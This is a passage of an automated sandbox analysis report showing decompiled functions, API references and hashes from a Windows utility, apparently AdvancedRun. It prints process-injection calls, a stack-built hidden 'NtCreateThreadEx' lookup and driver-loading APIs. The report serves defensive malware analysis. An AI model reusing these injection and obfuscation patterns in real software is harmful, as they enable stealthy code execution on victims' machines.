Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1

GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

CreateProcessW, xrefs: 0040A4DD
D, xrefs: 0040A528
kernel32.dll, xrefs: 0040A4BB
GetLastError, xrefs: 0040A4FE

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21

Strings

NtQuerySystemInformation, xrefs: 00408E50
NtClose, xrefs: 00408EC9
NtSuspendThread, xrefs: 00408EED
NtTerminateThread, xrefs: 00408F11
NtResumeThread, xrefs: 00408EFF
NtQueryObject, xrefs: 00408EA5
ntdll.dll, xrefs: 00408E3F
NtUnloadDriver, xrefs: 00408E6F
NtOpenSymbolicLinkObject, xrefs: 00408E81
NtQueryInformationThread, xrefs: 00408EDB
NtQuerySymbolicLinkObject, xrefs: 00408E93
NtOpenThread, xrefs: 00408EB7
NtLoadDriver, xrefs: 00408E5D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
{Unknown}, xrefs: 00408BA5

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

ProductName, xrefs: 0040B12F
040904E4, xrefs: 0040B122
OriginalFileName, xrefs: 0040B1BF
\VarFileInfo\Translation, xrefs: 0040B0D8
FileDescription, xrefs: 0040B141
FileVersion, xrefs: 0040B156
%4.4X%4.4X, xrefs: 0040B0F3
ProductVersion, xrefs: 0040B16B
CompanyName, xrefs: 0040B180
InternalName, xrefs: 0040B195
LegalCopyright, xrefs: 0040B1AA

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

e, xrefs: 0040A227
t, xrefs: 0040A223
a, xrefs: 0040A253
a, xrefs: 0040A22B
C, xrefs: 0040A237
r, xrefs: 0040A243
x, xrefs: 0040A24B
e, xrefs: 0040A233
h, xrefs: 0040A25B
ntdll.dll, xrefs: 0040A1FA
t, xrefs: 0040A22F
T, xrefs: 0040A257
r, xrefs: 0040A23B
e, xrefs: 0040A24F
d, xrefs: 0040A23F
E, xrefs: 0040A247
N, xrefs: 0040A21F

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
API String ID: 2574300362-1257427173
Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776

Uniqueness

Uniqueness Score: -1.00%

Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
